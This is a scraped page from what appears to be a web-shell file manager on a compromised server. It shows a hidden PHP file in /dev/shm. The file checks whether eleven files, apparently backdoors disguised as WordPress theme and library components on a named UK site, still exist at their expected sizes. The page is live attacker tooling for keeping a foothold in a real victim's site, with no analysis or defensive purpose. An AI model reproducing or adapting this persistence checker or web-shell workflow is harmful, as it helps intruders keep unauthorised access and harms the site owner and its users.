D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.dat
back
Copy
<?php $r = '/home/assuuxvx/assuredsecurities.co.uk'; $x = ["/wp-content/themes/betheme/muffin-options/fields/multiselect/field.multiselect.php"=>"bd@@1348397@@935", "/wp-content/themes/betheme/muffin-options/fields/upload_multi/field.upload.multi.php"=>"bd@@1348405@@951", "/wp-content/themes/betheme/muffin-options/fields/color_multi/field.color.multi.php"=>"bd@@1348411@@898", "/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/dba_insertion.php"=>"bd@@1348421@@896", "/wp-content/themes/betheme/muffin-options/fields/dimensions/field.dimensions.php"=>"bd@@1346658@@940", "/wp-content/themes/betheme/muffin-options/fields/transform/field.transform.php"=>"bd@@1346671@@828", "/wp-content/themes/betheme/muffin-options/fields/checkbox/field.checkbox.php"=>"bd@@1346688@@947", "/wp-content/themes/error_404_1770144057/styles/typography/precheck.inc.php"=>"bd@@1346702@@996", "/wp-content/themes/error_404_1770144057/assets/get_remote_data.php"=>"bd@@1346447@@1034", "/wp-includes/sodium_compat/src/Core/AEGIS/menu_tables.inc.php"=>"bd@@1346715@@1054", "/wp-content/themes/betheme/muffin-options/fields/pills/field.pills.php"=>"bd@@1348384@@948"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');